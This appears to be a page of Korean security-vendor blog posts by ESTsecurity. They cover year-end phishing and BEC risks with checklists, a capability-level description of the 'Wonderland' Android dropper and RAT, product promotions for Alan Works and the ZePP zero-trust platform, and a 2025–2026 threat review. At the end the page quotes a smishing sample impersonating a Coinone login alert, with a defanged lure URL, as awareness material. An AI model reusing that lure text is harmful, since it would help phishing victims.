Signicat, Keepnet Labs – 딥페이크 사기 비중(약 6.5%) 및 증가율 관련 통계
Deepfake 통계·사례 – 다양한 딥페이크 사기 동향 및 사례 정리 자료
일반 피싱·스미싱 및 가족 보안 수칙 – 글로벌 피싱 통계, 사용자 보호 가이드 자료

연말 시즌, 기업과 개인을 동시에 노리는 사이버 공격 주의보

알약5 — Tue, 30 Dec 2025 10:38:34 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

연말은 한 해를 마무리하는 시기이자, 사이버 공격자들이 가장 활발하게 움직이는 시기이기도 합니다. 실제로 다수의 글로벌 보안 리포트와 침해 사고 통계를 살펴보면, 연말과 연초는 피싱·스미싱·랜섬웨어·계정 탈취 공격이 집중적으로 증가하는 대표적인 고위험 구간으로 분류됩니다.

업무 마감과 결산이 몰리고, 개인 역시 소비와 이동이 늘어나며 판단력이 느슨해지기 쉬운 시기. 바로 이 ‘틈’을 공격자들은 놓치지 않습니다. 연말은 단순히 바쁜 시기가 아니라, 구조적으로 보안 사고가 발생하기 쉬운 환경이 만들어지는 시점입니다.

왜 연말이 사이버 공격의 성수기일까?

연말은 기업과 개인 모두에게 보안 관점에서 구조적으로 취약해지는 시기입니다.

기업: 바쁜 업무 환경 + 느슨해진 보안 통제

기업의 경우 예산 집행, 정산, 연말 결재 등으로 이메일과 문서 교류가 급증하고, 임원이나 주요 의사결정자의 부재로 확인 절차가 느슨해지는 경우가 많습니다. 협력사·외주 인력과의 단기 업무가 늘어나면서 접근 권한 관리 역시 복잡해집니다.

예산 집행·정산·결산 업무로 이메일·문서 교류 급증
임원·관리자 부재로 결재 프로세스 지연
협력사·외주 인력과의 단기 업무 증가
보안 담당자의 휴가·인력 공백

이런 환경을 노려 공격자는 결재 요청을 사칭한 이메일(BEC), 송금 계좌 변경 요청, 악성 첨부파일이 포함된 업무 메일을 정교하게 유포합니다. '연말이라 바빠서 미처 확인하지 못했다'는 말이 사고의 출발점이 되는 이유입니다.

개인: 소비·이동 증가로 판단력 저하

개인 사용자 역시 예외는 아닙니다. 연말에는 택배, 결제, 환불, 이벤트 안내 문자가 급증하고, 항공권·숙소·모임 예약 등 링크 클릭 빈도도 자연스럽게 높아집니다.

택배·결제·환불 안내 문자 증가
연말 할인·이벤트·쿠폰 메시지 범람
항공권·숙소·모임 예약 관련 링크 클릭 증가
가족·지인 명의 사칭 문자·메신저 증가

특히 스미싱·피싱 메시지는 연말에 정상 알림처럼 위장해 접근하는 경우가 많아, 한 번의 클릭만으로도 계정 탈취·금융 피해로 이어질 수 있습니다.

연말에 특히 많이 발생하는 공격 유형

연말에 증가하는 사이버 공격 유형은 다양하지만, 공통된 특징이 있습니다. 바로 ‘지금 확인하지 않으면 문제가 생긴다’는 심리를 자극한다는 점입니다.

기업 대상 주요 위협

결재 요청 사칭 이메일(BEC)
연말 정산·급여·세무 관련 피싱 메일
랜섬웨어 유포용 악성 문서
협력사·외주 인력 계정 탈취 후 내부 침투
내부자 실수로 인한 문서 유출

개인 대상 주요 위협

택배·카드·정부기관 사칭 스미싱
연말 이벤트·경품 당첨 사기
가짜 쇼핑몰·결제 페이지 피싱
메신저 계정 탈취 후 지인 사칭

기업을 대상으로는 결재 요청이나 세무·급여 관련 메일처럼 긴급성을 강조하는 공격이 많고, 개인에게는 택배 지연, 카드 오류, 이벤트 당첨 안내 등 일상과 밀접한 내용으로 접근합니다. 공격자는 기술보다 사람의 심리를 먼저 노립니다.

문제는 이런 공격이 대부분 정상적인 업무 흐름이나 생활 패턴과 매우 유사하다는 점입니다. 그래서 연말에 발생한 보안 사고는 단순한 실수가 아니라, 누구에게나 일어날 수 있는 현실적인 위험으로 이어집니다.

연말 보안 사고는 왜 더 치명적일까?

연말에 발생한 보안 사고는 평소보다 피해가 커지는 경향이 있습니다. 인력 공백이나 휴가로 인해 초기 대응이 지연되고, 사고 인지 자체가 늦어지는 경우도 많습니다. 내부 커뮤니케이션이 원활하지 않아 대응 과정에서 혼선이 발생하기도 합니다.

인력 공백으로 초기 대응 지연
사고 인지까지 시간이 오래 걸림
내부 커뮤니케이션 혼선
금전·평판 손실이 다음 해까지 이어짐

특히 랜섬웨어나 계정 탈취 사고는 연초 업무가 시작되는 시점까지 영향을 미치며, 다음 해의 업무 연속성과 신뢰도에 직접적인 타격을 줄 수 있습니다. 연말 보안 사고는 ‘그해의 문제’로 끝나지 않는 이유입니다

지금 점검해야 할 보안 포인트

이 시점에서 중요한 것은 복잡한 보안 대책이 아니라, 기본적인 점검과 경계입니다.

✔ 기업 보안 점검 포인트

연말 결재·정산 관련 메일 보안 공지 여부
외부 반출 문서·권한 관리 점검
임원·관리자 계정 MFA 적용 여부
랜섬웨어 대응 백업 상태 확인
보안 솔루션 업데이트 및 정책 점검

기업은 연말 결재·정산 관련 메일에 대한 주의 공지가 이루어지고 있는지, 외부 반출 문서와 계정 권한 관리가 적절히 통제되고 있는지 점검할 필요가 있습니다. 임원·관리자 계정의 다중 인증(MFA) 적용 여부, 백업 상태와 보안 솔루션 업데이트 여부 역시 반드시 확인해야 할 요소입니다.

✔ 개인 보안 점검 포인트

출처 불명 문자·링크 클릭 금지
앱 설치 유도 메시지 차단
메신저·이메일 계정 보안 설정 확인
스마트폰 보안 앱 최신 상태 유지
가족·지인 사칭 메시지 전화로 재확인

개인 사용자 역시 출처가 불분명한 문자나 링크를 무심코 클릭하지 않는 습관, 앱 설치를 유도하는 메시지에 대한 경계, 메신저·이메일 계정의 보안 설정 점검이 필요합니다. 특히 가족이나 지인 명의를 사칭한 메시지는 반드시 전화나 다른 수단으로 재확인하는 것이 안전합니다.

연말은 보안의 끝이 아니라, 다음 해를 위한 시작입니다

연말은 한 해를 정리하는 시기이지만, 보안 관점에서는 다음 해를 준비하는 출발점이기도 합니다. 공격자는 쉬지 않습니다. 다만 우리가 가장 바쁘고, 가장 방심하는 순간을 기다릴 뿐입니다. 기업과 개인 모두, 지금 이 시점에서 보안을 한 번 더 점검하는 것이 가장 현실적인 연말 대비 전략입니다. 작은 점검 하나가 큰 사고를 막을 수 있습니다.

이스트시큐리티는 연말·연초에 집중되는 사이버 위협에 대비해 지속적인 위협 모니터링과 분석, 보안 대응을 이어가겠습니다. 올 한 해도 보안에 대한 관심과 노력을 해주신 많은 분들께 감사합니다.

보안 대비 철저히 하시고, 안전하고 편안한 연말 보내시길 바랍니다. 다가오는 새해도 이스트시큐리티가 든든한 보안 파트너로 함께하겠습니다!

안드로이드 악성코드의 발 빠른 진화 - 드로퍼·SMS 탈취·RAT 기능 결합한 ‘Wonderland’ 확산

알약5 — Wed, 24 Dec 2025 08:00:00 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

최근 안드로이드 악성코드 공격 양상이 단순한 정보 탈취 단계를 넘어, 원격 제어·자동 확산·실시간 금융 사기를 모두 수행하는 통합 공격 프레임워크 형태로 빠르게 진화하고 있습니다. 그 중심에 있는 대표적인 사례가 바로 ‘원더랜드(Wonderland)’ 악성코드입니다.

드로퍼 기반 위장 설치로 정상 앱처럼 보이는 것이 특징

보안 기업 Group-IB 분석에 따르면 Wonderland는 정상 앱으로 위장한 드로퍼(dropper)를 통해 최초 침투를 시도합니다. 기존처럼 설치 즉시 악성 행위를 수행하는 ‘노골적인 트로이목마 APK’가 아니라, 겉보기에는 정상 앱처럼 동작하다가 내부에 은닉된 악성 페이로드를 로컬 환경에서 실행하는 방식입니다.

이 구조는 네트워크 연결 없이도 악성코드 설치가 가능하며, 초기 보안 점검이나 정적 분석을 회피하는 데 매우 효과적입니다.

SMS 탈취 + 실시간 RAT 제어 결합 - 금융 사기 자동화

Wonderland는 단순 SMS 스틸러가 아닙니다. 양방향 C2(Command & Control) 통신을 통해 공격자가 실시간으로 명령을 내릴 수 있으며, 다음과 같은 기능을 수행합니다.

[이미지 출처] The HackerNews

SMS 및 OTP(일회용 비밀번호) 가로채기
USSD 명령 실행
연락처·전화번호 탈취
알림 숨김(보안·OTP 알림 차단)
감염 기기를 이용한 추가 SMS 발송(측면 확산)

이를 통해 공격자는 금융 인증 절차를 실시간으로 우회하며 자금을 탈취할 수 있고, 감염된 기기를 또 다른 공격 거점으로 활용할 수 있습니다.

텔레그램 기반 ‘무한 증식’ 구조로 계정 탈취 → 재유포

[이미지 출처] Group-IB

Wonderland 공격 조직(TrickyWonders)은 텔레그램을 핵심 인프라로 활용합니다. 악성 앱이 설치된 이후 사용자가 권한을 허용하면, 공격자는 해당 기기의 전화번호를 이용해 텔레그램 계정을 탈취하고, 해당 계정의 대화 목록·연락처를 대상으로 악성 APK를 재유포합니다.

이 과정이 반복되며 감염은 순환 구조(cyclical infection chain)로 확산되고, 실제로 다크웹에서는 탈취된 텔레그램 세션이 유통되며 공격에 활용되고 있는 것으로 확인됐습니다.

드로퍼·RAT·MaaS 결합 - 안드로이드 악성코드의 ‘플랫폼화’ 가속

Wonderland는 단일 사례가 아닙니다. 최근에는 Cellik, Frogblight, NexusRoute 등 기능이 고도화된 안드로이드 악성코드 패밀리들이 잇따라 등장하고 있습니다. 이들의 공통점은 다음과 같습니다.

드로퍼 기반 위장 설치 구조
실시간 화면 스트리밍, 키로깅, 카메라·마이크 접근
OTP·결제 정보 탈취
Malware-as-a-Service(MaaS) 형태의 서비스 모델

특히 Cellik의 경우, 공격자가 Google Play의 정상 앱을 선택해 악성 페이로드를 자동으로 결합하는 ‘원클릭 APK 빌더’ 기능까지 제공하고 있어, 기술력이 낮은 공격자도 대규모 공격을 손쉽게 실행할 수 있는 환경이 만들어지고 있습니다.

보안 전문가 경고 - '개별 공격에서 범죄 비즈니스로 전환'

보안 업계는 이러한 흐름이 단순한 공격 기법의 진화가 아니라, 안드로이드 해킹이 완전히 ‘플랫폼화된 범죄 비즈니스’로 전환됐음을 보여주는 신호라고 분석합니다.

드로퍼 기술과 실시간 RAT 기능의 결합은 기존의 정적 필터링·서명 기반 보안 체계를 무력화하며, 공격 인프라는 빠르게 교체되는 도메인과 빌드 단위 C2 구조로 운영돼 차단 또한 점점 어려워지고 있습니다.

사용자 주의사항: 설치 경로와 ‘접근성 권한’이 핵심

이와 같은 공격의 대부분은 사용자의 설정 변경과 권한 허용에서 시작됩니다. 특히 다음 사항에 각별한 주의가 필요합니다.

출처가 불분명한 APK 파일 설치 지양
'업데이트 필요' 메시지를 통한 알 수 없는 앱 설치 요구 주의
접근성 서비스 권한을 요구하는 앱은 설치 즉시 점검
문자·메신저를 통한 앱 설치 링크 클릭 금지
보안 알림이 갑자기 사라지거나 OTP 문자가 보이지 않을 경우 즉시 점검

Wonderland를 비롯한 최신 안드로이드 악성코드는 더 이상 단순한 스팸이나 정보 탈취 수단이 아니라, 실시간 제어·확산·금융 사기를 동시에 수행하는 통합 공격 플랫폼으로 진화하고 있습니다. 이런 변화는 모바일 보안 역시 단편적인 대응이 아닌, 지속적인 위협 모니터링과 다계층 대응 체계로 전환이 필요함을 시사합니다.

Plus Tip! 모바일 보안, 이렇게 시작해보세요!

이스트시큐리티는 고도화되는 모바일 위협 환경에 대응하기 위해 최신 악성코드 동향을 지속적으로 분석하고, 사용자 보호를 위한 보안 기술 고도화를 이어가고 있습니다.

이러한 환경에서 알약 모바일 앱은 악성 앱 설치나 스미싱 메시지로 시작되는 위험 신호를 사전에 인지하고 점검할 수 있도록 돕는 기본적인 모바일 보안 관리 수단으로 활용할 수 있습니다. 일상적인 스마트폰 사용 중에도 작은 이상 징후를 놓치지 않고 확인하는 습관이 모바일 위협을 예방하는 첫 단계가 됩니다. 지금, 알약 모바일을 통해 내 스마트폰의 보안 상태를 간단하게 점검해 보시기 바랍니다.

[참고 출처]

Group-IB, <Android malware campaigns in Uzbekistan – Wonderland/TrickyWonders> (2025-12-19)
The Hacker News, <Android Malware Operations Merge Droppers, SMS Theft, and RAT Control>(2025-12-21)
ImPreza Host, <From Trojan APKs to Stealthy Droppers: Wonderland Android Malware Evolves> (2025-12-21)
Varutra / Tech, <Cellik Android Malware Turns Trusted Google Play Apps into Stealthy Trojanized Threats> (2025-12-17)

보안 솔루션 도입 시, 기업용 AI 플랫폼 ‘Alan Works’ 계정 무료 제공!

알약5 — Mon, 22 Dec 2025 15:07:15 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

보안과 AI 활용이 더 이상 선택이 아닌 필수가 된 지금, 기업 업무 환경에도 ‘안전한 생성형 AI 활용’에 대한 기준이 필요해지고 있습니다. 이러한 흐름에 맞춰 이스트시큐리티는 기업 보안 솔루션 도입 고객을 대상으로, 안전한 기업용 멀티 LLM 플랫폼 ‘Alan Works’ 계정 무료 제공 프로모션을 진행합니다.

이번 프로모션은 단순한 부가 혜택이 아닌, 보안과 AI 혁신을 동시에 경험할 수 있는 기회라는 점에서 주목할 만합니다. 특별한 이번 기회, 놓치지 말고 지금 자세한 내용을 확인해 주세요!

보안 솔루션 도입 시, Alan Works 계정 무료 제공

이번 프로모션은 알약, 알툴즈, 문서중앙화 솔루션 신규 도입 고객을 대상으로 진행됩니다. 해당 솔루션을 도입하신 고객께는 도입 금액에 따라 Alan Works 계정을 무료로 제공해 드립니다.

프로모션 안내

프로모션 대상: 알약 / 알툴즈 / 문서중앙화 솔루션 신규 도입 고객
혜택 내용: Alan Works 계정 무료 제공 (도입 금액 200만원당 1계정 제공)
프로모션 기간: ~ 2025년 12월 31일
상담 신청하기: 바로가기(Click)

※ 본 프로모션은 한정 수량으로 조기 종료될 수 있습니다.

Alan Works란 무엇인가요?

Alan Works는 기업 환경에 최적화된 안전한 멀티 LLM 기반 AI 업무 플랫폼입니다. 개인용 AI 서비스와 달리, 기업 데이터 보호와 관리 기능을 기본 전제로 설계되어 보안 리스크를 최소화하면서도 업무 생산성을 극대화할 수 있습니다.

✔ 다양한 최신 LLM을 한 번에

ChatGPT, Claude, Gemini 등 15종 이상의 최신 LLM을 하나의 플랫폼에서 사용할 수 있어, 목적에 따라 가장 적합한 모델을 선택할 수 있습니다.

✔ 멀티 모델 비교 활용

하나의 질문에 대해 여러 LLM의 답변을 동시에 비교해, 가장 정확하고 효율적인 결과를 빠르게 도출할 수 있습니다.

✔ 프롬프트 라이브러리 제공

직무·업무 분야별로 최적화된 프롬프트를 제공해, AI 활용 경험이 많지 않은 사용자도 전문가 수준의 결과물을 쉽게 얻을 수 있습니다.

✔ KPI & 리포트 시스템

사용자·조직별 사용량, 비용, 품질 지표를 자동으로 분석해 월간 리포트 형태로 제공, AI 활용 현황을 체계적으로 관리할 수 있습니다.

업무 효율 2배, 지금 바로 시작하세요!

보안은 강화하고, 업무 효율은 높이고, AI 활용까지 한 번에!

이번 프로모션은 기업 보안 도입을 고민 중인 조직에게 실질적인 가치를 제공하는 기회입니다.

✔ 보안 솔루션 도입
✔ Alan Works 계정 무료 제공
✔ 안전한 생성형 AI 업무 환경 구축

지금 바로 이스트시큐리티와 함께, 보안과 AI 혁신을 동시에 시작해 보시기 바랍니다!

경계 없는 시대, 왜 지금 ‘제로트러스트’인가? - 엔드포인트 중심 보안으로 다시 설계하는 기업 보안

알약5 — Mon, 22 Dec 2025 11:20:29 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

최근 국내외에서 대규모 개인정보 유출 사고가 잇따라 발생하며 기업 보안 환경에 심각한 경고 신호가 켜지고 있습니다. 대형 이커머스 플랫폼부터 공공기관, 금융사까지 산업 전반에서 유출 사고가 이어지고 있으며, 이름·연락처와 같은 정보도 스미싱, 계정 탈취, 내부 사칭 이메일(BEC) 등 2차 공격으로 빠르게 악용되고 있습니다. 여기에 재택근무, 클라우드, SaaS 기반 업무가 일상화되면서 업무 환경은 더욱 확장되었고, 기존처럼 회사 네트워크 경계만 지키는 방식은 더 이상 유효하지 않게 되었습니다.

한국인터넷진흥원의 분석에 따르면 최근 랜섬웨어 공격의 95%가 내부망에서의 횡적 이동(Lateral Movement)을 통해 확산되는 것으로 나타났습니다. 이는 한 번 내부로 침입이 발생하면 피해가 전사적으로 확대될 수 있음을 의미하며, 기업 보안 운영 방식의 근본적인 재정비가 필요한 시점임을 보여줍니다. 이러한 변화 속에서 주목받고 있는 보안 패러다임이 바로 제로트러스트(Zero Trust) 입니다.

제로트러스트란 무엇인가?

제로트러스트의 원칙은 매우 단순합니다.

“아무도 신뢰하지 말고, 모든 접근을 검증하라.”

기존 보안이 내부 네트워크에 들어오면 신뢰를 전제로 운영되었다면, 제로트러스트는 사용자·기기·네트워크·애플리케이션에 대해 지속적으로 검증하고, 필요한 최소한의 권한만을 허용합니다. 이를 통해 내부 확산을 사전에 차단하고, 보다 정교한 접근 통제가 가능해집니다.

이스트시큐리티 제로트러스트 통합 플랫폼 ‘ZePP'

이스트시큐리티는 국내 1,600만 사용자 기반으로 검증된 알약 엔드포인트 보안 기술에 제로트러스트 아키텍처를 결합해 엔드포인트 중심 제로트러스트 통합 보안 플랫폼 ‘알약 ZePP’을 제공합니다. 알약 ZePP은 네트워크 접근제어, 사용자 인증, 엔드포인트 보안, 통합 보안 정책 관리를 하나의 플랫폼으로 구성한 것이 특징입니다.

특히 알약 ZePP은 NIST SP 800-207(Zero Trust Architecture) 기준을 기반으로 설계되었으며, 2024년 KISA 통합보안모델 개발 시범사업과 2025년 제로트러스트 도입 시범사업을 통해 실제 환경에서 구조적 안정성과 운영 가능성을 검증했습니다. 단일 솔루션이 아닌, 기업 보안 환경 전반을 고려한 제로트러스트 기반 통합 구조라는 점에서 차별성을 갖습니다.

알약 ZePP은 사용자와 기기의 상태, 보안 정책 준수 여부를 종합해 신뢰 점수 기반 접근 제어를 수행하며, 보안 상태 변화에 따라 접근 권한을 유연하게 조정할 수 있도록 설계되었습니다.

알약 ZePP 주요 기능 한눈에 보기

1. 제로트러스트 표준 준수

NIST SP 800-207 Zero Trust Architecture를 기반으로, 사용자·기기·네트워크를 지속적으로 검증하는 구조를 제공합니다.

2. 동적 접근 제어 및 네트워크 보호

SDP(Software Defined Perimeter) 기반 접근 제어를 통해 비인가 접근을 차단하고, 기존 네트워크 변경 없이 내부 횡적 이동을 효과적으로 통제합니다.

3. 엔드포인트 인증 및 보안 상태 연계

사용자 인증과 엔드포인트 보안 상태를 연계해, 보안 수준에 따라 접근 권한을 조정합니다.

4. 통합 보안 정책 관리

엔드포인트, 접근 제어, 인증 정보를 하나의 콘솔에서 관리해 보안 운영 효율성과 가시성을 높입니다.

5. 신뢰 점수 기반 보안 운영

사용자·기기·애플리케이션의 보안 상태를 정량화해 신뢰 점수로 산출하고, 이를 기반으로 보안 정책을 적용합니다.

알약 ZePP 도입 효과

알약 ZePP은 제로트러스트 아키텍처 기반으로 보안 리스크를 줄이고, 보안 운영 효율성을 함께 고려한 플랫폼입니다. 네트워크 변경 없이 적용 가능한 구조로 도입 부담을 낮추는 동시에, 엔드포인트 중심의 통합 보안 체계를 통해 보안 정책의 일관성과 운영 안정성을 확보할 수 있습니다.

제로트러스트는 이미 현실에서 검증되고 있습니다

이스트시큐리티는 제로트러스트 보안 원칙을 스마트빌딩 환경에도 적용해 실제 운영 환경에서의 실증을 진행하고 있습니다. 해당 실증은 산업통상자원부와 한국에너지기술평가원이 주관하는 국책과제 ‘자율운전 기반 지능형 건물 에너지환경 통합관리시스템(iBEEMS)’의 일환으로, 스마트빌딩 내 센서·제어 시스템·IoT 장비의 이상 행위를 분석하고 비인가 접근을 탐지하는 보안 기술 검증을 목표로 합니다.

공격 시나리오 기반 분석과 이상 행위 탐지를 통해, 제로트러스트의 핵심 원칙인 ‘지속적 검증’과 ‘행위 기반 판단’이 실제 환경에서도 효과적으로 적용될 수 있음을 확인하고 있으며, 전국 5개 실증 현장에서 연동 테스트가 진행 중입니다. 이는 제로트러스트가 IT 환경을 넘어 OT·IoT 영역까지 확장될 수 있음을 보여주는 사례입니다.

새로운 보안 운영 체계로의 전환, 알약 ZePP

사이버 위협이 고도화되는 환경에서 기존 경계 중심 보안만으로는 충분한 대응이 어렵습니다. 제로트러스트는 기업 보안 운영 방식을 근본적으로 전환하는 전략이며, 알약 ZePP은 이를 현실적인 구조로 구현한 제로트러스트 통합 보안 플랫폼입니다. 이스트시큐리티는 알약 ZePP을 통해 기업이 변화하는 위협 환경에 보다 안정적으로 대응할 수 있는 보안 체계를 구축할 수 있도록 지원합니다.

트워크 접근부터 사용자 인증, 엔드포인트 보안 상태까지 하나의 흐름으로 연결해 관리함으로써, 기업은 보다 명확한 보안 기준과 일관된 정책으로 보안 운영을 이어갈 수 있습니다. 또한 기존 인프라 변경 부담 없이 단계적으로 적용할 수 있어, 제로트러스트 도입을 고민하는 기업에게 현실적인 선택지가 될 수 있습니다.

우리 조직의 환경에서는 제로트러스트를 어떻게 적용할 수 있을지, 알약 ZePP으로 어떤 영역부터 보안 체계를 재정비할 수 있을지가 궁금하다면, 이스트시큐리티 전문가와의 상담을 통해 확인해 보시기 바랍니다. 기업 환경에 맞춘 도입 방향과 적용 범위를 함께 검토해 드립니다.

2025년 보안 위협 회고 및 2026년 보안 위협 전망

알약4 — Mon, 22 Dec 2025 09:49:52 +0900

안녕하세요
이스트시큐리티 시큐리티대응센터(ESRC) 입니다.

이스트시큐리티는 2025년에 발생했던 보안 위협들을 정리해보고, 2026년 보안 위협들을 전망해 보았습니다.

2026년 보안 위협 전망

1) AI, 전 공격 단계에서 핵심 자원으로 활용

2026년 이후에는 AI가 사이버 공격의 모든 단계에 전면적으로 활용되며, 공격 체인의 자동화와 지능화가 본격화될 것으로 예상됩니다.

정찰,취약점 분석,침투,측면 이동,데이터 탈취 및 협상에 이르기까지 공격 전 과정을 AI가 보조하는 형태로 확장될 가능성이 높습니다. 특히 공격자들은 인터넷 노출 자산을 자동으로 파악하고, 서비스별 취약점을 AI가 실시간으로 분석하며, 환경에 맞춰 악성 페이로드를 즉시 생성 및 변형하는 AI 공격 파이프라인도 구축할 것으로 예상됩니다.

특히 AI 기술의 발전은 고도화된 공격을 수행하기 위한 기술적 장벽을 크게 낮추어, 과거에는 전문 APT 그룹만 가능했던 정교한 공격을 일반 공격자도 수행할 수 있는 환경이 만들어 지며 전 공격 단계에서 AI가 핵심 자원으로 활용될 것으로 예상됩니다.

2) APT 조직들의 랜섬웨어 활용 보편화

2026년에는 국가 연계 APT 조직의 공격 체계에서 정찰, 정보 수집 중심 공격과 데이터 암호화·갈취를 결합한 ‘혼합형 위협 모델’이 더욱 확대될 것으로 전망됩니다.

랜섬웨어는 단순한 금전 수익 창출을 넘어, 핵심 산업 부문의 운영을 중단시키거나 사회적 혼란을 유발하는 정치, 전략적 압박 수단으로 활용되고, APT공격은 정찰 및 정보수집이 목적이고, 랜섬웨어는 금전적 이득을 목적으로 한 범죄조직이라는 기존의 개념의 의미는 퇴색되고 국가 차원의 위협과 범죄 기반 공격 생태계가 융합되는 형태로 진화할 것으로 예상됩니다.

3) 국가 간 갈등심화에 따른 사이버전 격화

2026년에는 이미 진행 중인 전쟁에서 검증된 사이버 공격 전술들이 다른 갈등 지역으로 확산되면서, 국가 간 사이버전의 양상이 더욱 전략적이고 파괴적인 형태로 고도화될 것으로 예상됩니다.

와이퍼 악성코드, 위성통신 교란, 핵심 인프라 파괴, 정보전 등은 실제 전장에서 효과가 확인된 공격 모델들로, 2026년 이후 고조되는 국가 간 긴장 상황에서도 정치·군사적 목적 달성을 위한 전면적 사이버전 전술로 재사용되거나 더 정교해진 버전이 등장할 가능성이 큽니다.

현재 진행되고 있는 여러 국가들의 갈등 상황이 무력 전쟁으로 확대될 경우, 금융, 통신, 에너지 등 국가 기능 전반을 마비시키려는 전략적 사이버 공격도 본격화될 것이며, 강화된 형태의 파괴형 악성코드, 대규모 정보조작, 심리전, 사회 혼란 유발형 공격이 동시에 동원될 가능성이 높습니다.

또한 국가 지원 해커 그룹을 지원하거나 다양한 국가 지원 해커 그룹을 양성하는 등 국가차원에서 사이버 공격을 더욱 적극적으로 전개할 가능성도 있을 것으로 예상됩니다.

4) 오픈소스 생태계를 겨냥한 공급망 공격의 심화

오픈소스 생태계의 의존도가 증가하면서, 공격자들은 오픈소스를 공급망 공격의 취약 지점으로 활용하려는 시도가 증가할 것으로 예상됩니다.

특히 패키지 레지스트리 자체에 대한 공격 시도가 확대되며, 단일 패키지의 공격이 수만 개의 프로젝트로 전파되는 대규모 피해가 반복될 가능성이 높으며, 단순 패키지 공격 수준을 넘어 오픈소스 레지스트리, 프로젝트 유지관리자, AI 개발 도구까지 하나의 확장된 공격 표면으로 통합되는 단계로 진화할 것으로 예상됩니다.

5) IOT/OT를 노린 국가 차원의 물리, 사이버 복합 공격 증가

2026년에는 국가 간 갈등이 심화되는 가운데, 전면적 사이버전과는 별개로 산업 인프라 자체를 직접 교란하는 전술적 하이브리드 공격이 증가할 것으로 예상됩니다.

스마트 시티 인프라, 에너지 설비, 교통 체계 등 IoT/OT 기반 산업 제어 시스템이 국가 경쟁력의 핵심 자산으로 부각되면서, 공격 표면은 더 넓어지고 있습니다. 특히, 대부분의 OT 환경은 실시간 운영 요구사항과 오래된 레거시 시스템의 특성 때문에 보안 패치 및 업데이트가 어려워 근본적인 방어에 취약점을 안고 있습니다.

공격자들은 이러한 IoT/OT의 특징을 노려, 취약한 IoT 단말을 침투 지점으로 활용하고, OT/ICS 영역까지 침투하는 단계적 공격 방식을 시도할 것으로 예상되며, 이러한 흐름은 국가 인프라의 실질적 운영 중단, 장비 손상, 물리적 사고 유발까지 이어질 수 있어 사이버전과는 다른 차원의 산업 기반 위협으로 자리 잡을 것으로 전망됩니다.

2025년 보안 위협 회고

1) APT 조직들의 랜섬웨어 활용 본격화

기존의 정보 수집 중심의 APT 공격과 달리, 2025년에는 데이터 암호화, 탈취, 협박을 결합한 복합 공격 전략을 구사하는 APT 조직들이 발견되었으며, 이는 APT 조직의 공격 목적이 정찰, 정보 탈취와 금전적 수익 창출의 경계를 넘어 다목적화되고 있음을 의미합니다.

북한 국가 지원 해킹 그룹인 ScarCruft(APT37), 중국의 지원을 받는 Strom-2603그룹이 전통적인 첩보 활동과 더불어 암호화폐 거래소 공격, 랜섬웨어 배포 등 금전적 이익을 추구하는 활동을 병행하고 있음이 확인되었습니다.

이러한 변화는 국가 차원의 자금 조달 수단으로서 사이버 범죄가 활용되고 있으며, APT와 사이버 범죄 조직 간의 경계가 모호해지는 새로운 위협 환경이 조성되고 있다고 볼 수 있습니다.

2) AI기반 사이버 공격의 본격화

2025년은 사이버 보안 분야에서 AI의 위협적 활용이 현실화되면서, AI를 무기로 한 공격 시대가 본격 개막된 해였습니다.

단순 취약점 익스플로잇이 아닌 AI 기술을 활용한 AI-powered 랜섬웨어가 확인되었고, 한 AI가 생성한 합성 음성을 활용한 CEO 사칭 사기, 실시간 얼굴 교체 기술을 이용한 화상 면접 해킹 등 새로운 유형의 공격도 증가했습니다. 특히 AI의 활용은 공격 코드의 생성 속도를 극적으로 높이고 대규모의 표적 맞춤형 피싱 공격을 자동화하며 위협의 규모와 정교함을 한 차원 끌어올렸다는 중요한 특징이 있습니다.

3) 대규모 서비스 기업 중심의 사이버 공격 확산

2025년에는 국내 핵심 디지털 서비스 기업을 겨냥한 공격이 전례 없이 빈번하게 발생하며, 대규모 플랫폼 중심의 사이버 리스크가 한층 부각된 한 해였습니다.

특히 통신, 전자상거래, 금융 등 일상생활과 산업 전반을 지탱하는 인프라 기업들이 공격 시도의 주요 표적이 되었고, 일부 조직에서는 내부 계정 탈취, 주요 시스템 마비, 대규모 개인정보 유출 등 심각한 사고가 발생했습니다.

사회적 파급력이 큰 서비스 영역을 중심으로 정교한 침투 기법과 공격 경로가 반복적으로 활용되면서, 유출된 개인정보들을 활용한 2차 피해도 우려되고 있습니다.

이러한 사이버 공격의 흐름을 통해 공격자들이 단순한 취약점이 아닌 대규모 사용자 기반과 높은 경제적 가치를 기준으로 목표를 선정하고 있다는 점을 알 수 있습니다.

4) 공급망 공격 지속 및 확산

다양한 산업군에서 공급망 공격이 연속적으로 발생하며, 신뢰된 개발/운영 생태계가 공격의 주요 경로로 활용되는 경향이 더욱 강화되었습니다.

3월에는 GitHub Actions 워크플로가 공격자에 의해 변조되는 CI/CD 공급망 공격 발견되며 개발자가 사용하는 자동화 도구 자체가 위협 벡터로 사용될 수 있음이 확인되었습니다. 또한 GlassWorm 사례처럼 신뢰된 오픈소스 패키지를 조용히 변조해 장기간 잠복하는 형태의 공격이 광범위한 생태계에 확산될 수 있음도 확인되었습니다.

공격자들이 더 이상 단일 시스템을 공격하지 않고, 서드파티,  패키지, CI/CD, 지갑 등 소프트웨어 공급망 전반을 노려 대규모 확산을 추구하고 있는 형태로 공격이 변화하고 있다는 점을 알 수 있습니다.

5) OT 보안위협의 현실화 및 공격 표면 확대

IT/OT 결합이 가속화 되면서, 과거에 분리 운영되었던 OT 시스템에서 IT 환경의 위협이 그대로 전파될 수 있는 구조로 변화하고 있습니다.

레거시 시스템, 취약한 인증 및 원격 접근, 기본 설정 사용 등 많은 OT 환경이 여전히 안전성을 이유로 패치되지 않은 오래된 OS나 보안 기능이 취약한 장비를 사용하며, 다요소 인증(MFA)이나 강력한 접근 제어 없이 운영되는 경우가 많이 있습니다. 또한 원격 접근기능 확대와 클라우드 연동 증가로 인해 OT 환경의 공격 표면이 크게 증가하고 있습니다.

2025년 한 해동안 발생한 보안이슈들을 정리해 보았으며, 2026년도 보안이슈들을 전망해 보았습니다.

이스트시큐리티는 2026년도에도 안전한 세상을 만들수 있도록 최선을 다하겠습니다.

새해 복 많이 받으세요.

감사합니다.

[Web발신][Coinone로그인알림]고객님계정이 해외에서 로그인감지되었습니다. hxxp://www.coino***.sbs

알약4 — Fri, 12 Dec 2025 14:30:34 +0900

[12월 둘째주]

No.	문자내용
